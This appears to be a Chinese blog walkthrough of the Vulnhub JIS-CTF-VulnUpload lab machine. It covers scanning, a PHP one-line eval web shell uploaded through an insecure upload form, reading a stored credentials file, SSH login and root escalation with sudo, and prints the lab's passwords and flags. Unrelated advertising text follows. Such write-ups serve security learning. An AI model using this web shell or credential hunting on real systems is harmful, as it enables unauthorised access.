【Vulnhub靶机】JIS-CTF-VulnUpload-CTF01靶机

JIS文档说明

JIS-CTF-VulnUpload-CTF01靶机下载地址

该靶机有5个flag

1、网卡配置

开启靶机,看见加载的进度条按shift,看到如下界面:

image-20230828203117026

然后按e键,修改 如下

rw signie init=/bin/bash    # rw读写 signie单用户 命令权限/bin/bash

image-20230828202442490

改完之后Ctrl+x进入单用户模式

先查看我们靶机的网卡名称ip a

image-20230828203322016

然后来到靶机vim /etc/network/interfaces下,进行网卡配置,

网卡默认配置如下

image-20230828202823803

进行网卡配置修改如下:

image-20230828203415086

然后重启网卡

/etc/init.d/networking restart

重启靶机

2、信息收集

靶机MAC:00:0C:29:09:00:9D

主机发现
sudo arp-scan -l

image-20230828203726965

端口扫描
sudo nmap -A -p- 192.168.80.140

image-20230828204026500

目录扫描
sudo dirsearch -u 192.168.80.140  

image-20230828204421711

dirb http://192.168.80.140

image-20230828204802515

3、漏洞探测

访问flag http://192.168.80.140/flag/
找到第一个flag

image-20230828204943711

访问robots.txt

http://192.168.80.140/robots.txt

image-20230828205038544

访问login.php

http://192.168.80.140/login.php

image-20230828205224719

发现没有什么发现,继续 看看其他目录

访问admin_area,打开F12 ,发现第二个flag

image-20230828205325814

​ username : admin
​ password : 3v1l_H@ck3r
​ The 2nd flag is : {7412574125871236547895214}

前往登录页面进行登录

image-20230828205519547

发现是一个文件上传的界面,我们可以上传一句话木马尝试得到 shell

4、漏洞利用

一句话木马

编辑一句话木马1.php

<?php  @eval($_REQUEST[6868])?>

在刚才的robots.txt文件里,又跟上传相关的

image-20230828205900277

访问http://192.168.80.140/uploads报错

访问http://192.168.80.140/uploaded_files/页面没反应,但是也没有报错,

继续访问http://192.168.80.140/uploaded_files/1.php,页面也没有报错

蚁剑 GetShell

URL地址:http://192.168.80.140/uploaded_files/1.php

连接密码:6868

image-20230828210153091

查找跟flag有关的文件

find / -name 'flag*' 2>/dev/null

image-20230828211756499

发现没有权限访问/var/www/html/flag.txt

/var/www/html/hint.txt里发现第三个 flag

image-20230828210507525

image-20230828210528853

尝试使用technawi密码来读取flag.txt文件,你可以在一个隐藏文件找到它

使用find命令查找

find / -user 'technawi' 2>/dev/null

image-20230828211332299

cat /etc/mysql/conf.d/credentials.txt

image-20230828211342164

得到technawi用户的密码

username : technawi
password : 3vilH@ksor

SSH连接

使用ssh连接ssh technawi@192.168.80.140,查看该用户能以root身份执行哪些文件,发现有所有的权限

image-20230828211958588

然后去看看/var/www/html/flag.txt,得到第五个flag

image-20230828212058326

提权
sudo su

image-20230828212336617

  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
【优质项目推荐】 1、项目代码均经过严格本地测试,运行OK,确保功能稳定后才上传平台。可放心下载并立即投入使用,若遇到任何使用问题,随时欢迎私信反馈与沟通,博主会第一时间回复。 2、项目适用于计算机相关专业(如计科、信息安全、数据科学、人工智能、通信、物联网、自动化、电子信息等)的在校学生、专业教师,或企业员工,小白入门等都适用。 3、该项目不仅具有很高的学习借鉴价值,对于初学者来说,也是入门进阶的绝佳选择;当然也可以直接用于 毕设、课设、期末大作业或项目初期立项演示等。 3、开放创新:如果您有一定基础,且热爱探索钻研,可以在此代码基础上二次开发,进行修改、扩展,创造出属于自己的独特应用。 欢迎下载使用优质资源!欢迎借鉴使用,并欢迎学习交流,共同探索编程的无穷魅力! 基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip 基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip 基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip
提供的源码资源涵盖了安卓应用、小程序、Python应用和Java应用等多个领域,每个领域都包含了丰富的实例和项目。这些源码都是基于各自平台的最新技术和标准编写,确保了在对应环境下能够无缝运行。同时,源码中配备了详细的注释和文档,帮助用户快速理解代码结构和实现逻辑。 适用人群: 这些源码资源特别适合大学生群体。无论你是计算机相关专业的学生,还是对其他领域编程感兴趣的学生,这些资源都能为你提供宝贵的学习和实践机会。通过学习和运行这些源码,你可以掌握各平台开发的基础知识,提升编程能力和项目实战经验。 使用场景及目标: 在学习阶段,你可以利用这些源码资源进行课程实践、课外项目或毕业设计。通过分析和运行源码,你将深入了解各平台开发的技术细节和最佳实践,逐步培养起自己的项目开发和问题解决能力。此外,在求职或创业过程中,具备跨平台开发能力的大学生将更具竞争力。 其他说明: 为了确保源码资源的可运行性和易用性,特别注意了以下几点:首先,每份源码都提供了详细的运行环境和依赖说明,确保用户能够轻松搭建起开发环境;其次,源码中的注释和文档都非常完善,方便用户快速上手和理解代码;最后,我会定期更新这些源码资源,以适应各平台技术的最新发展和市场需求。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

过期的秋刀鱼-

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值